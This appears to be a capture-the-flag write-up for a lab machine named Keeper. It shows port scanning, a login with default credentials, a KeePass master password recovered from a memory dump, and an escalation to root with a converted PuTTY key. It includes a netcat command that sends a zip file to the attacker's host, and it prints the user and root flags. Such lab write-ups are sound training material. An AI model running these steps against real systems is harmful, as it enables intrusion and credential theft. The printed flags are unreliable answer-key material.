Keeper

Recon

nmap_scan.log

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.114.18:22
Open 10.129.114.18:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.114.18

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKHZRUyrg9VQfKeHHT6CZwCwu9YkJosNSLvDmPM9EC0iMgHj7URNWV3LjJ00gWvduIq7MfXOxzbfPAqvm2ahzTc=
|   256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBe5w35/5klFq1zo5vISwwbYSVy1Zzy+K9ZCt0px+goO
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP (80)

Update DNS

Using default credentials we are able to login.

Creds: root:password

New user password leaked

SSH (22)

Creds: lnorgaard:Welcome2023!

└─$ sshpass -p 'Welcome2023!' ssh lnorgaard@keeper.htb
lnorgaard@keeper:~$ id
uid=1000(lnorgaard) gid=1000(lnorgaard) groups=1000(lnorgaard)

User.txt

lnorgaard@keeper:~$ cat user.txt
be3a5cac866608bdd2fc99a62cce4eaf

Privilege Escalation

lnorgaard@keeper:~/t$ unzip RT30000.zip
Archive:  RT30000.zip
  inflating: KeePassDumpFull.dmp
 extracting: passcodes.kdbx
lnorgaard@keeper:~/t$ file *
KeePassDumpFull.dmp: Mini DuMP crash report, 16 streams, Fri May 19 13:46:21 2023, 0x1806 type
passcodes.kdbx:      Keepass password database 2.x KDBX
RT30000.zip:         Zip archive data, at least v2.0 to extract, compression method=deflate

We can bruteforce the password of KeePass, but it also has a memory dump file which is odd.

keepass-password-dumper

First download zip

└─$ listen > RT30000.zip
---
lnorgaard@keeper:~/t$ busybox nc 10.10.14.42 4444 < RT30000.zip

Recover the password

➜ .\keepass_password_dumper.exe C:\Users\user\VBoxShare\KeePassDumpFull.dmp
...
Password candidates (character positions):
Unknown characters are displayed as "●"
1.:     ●
2.:     ø, Ï, ,, l, `, -, ', ], §, A, I, :, =, _, c, M,
3.:     d,
4.:     g,
5.:     r,
6.:     ø,
7.:     d,
8.:      ,
9.:     m,
10.:    e,
11.:    d,
12.:     ,
13.:    f,
14.:    l,
15.:    ø,
16.:    d,
17.:    e,
Combined: ●{ø, Ï, ,, l, `, -, ', ], §, A, I, :, =, _, c, M}dgrød med fløde

Password seems to be M}dgrød med fløde, but it doesn't work. If we Google this it's some kind of dish and Google corrects us on the name. Trying it with title case doesn't work, but all lowercase works.

Password: rødgrød med fløde

Creds: root:F4><3K0nd!

Root password didn't work...

Putty key can be converted to OpenSSH:

└─$ sudo apt install putty-tools
# puttygen your-putty-key.ppk -O private-openssh -o converted-key
└─$ puttygen root_note.txt -O private-openssh -o root.id_rsa
└─$ chmod 600 root.id_rsa

└─$ ssh root@keeper.htb -i root.id_rsa
root@keeper:~# id
uid=0(root) gid=0(root) groups=0(root)

Root.txt

root@keeper:~# cat root.txt
7820e89795eab3cbf4c6378373081014

PreviousJupiter NextLate

Last updated 8 months ago

hashtagRecon

hashtagHTTP (80)

hashtagSSH (22)

hashtagUser.txt

hashtagPrivilege Escalation

hashtagRoot.txt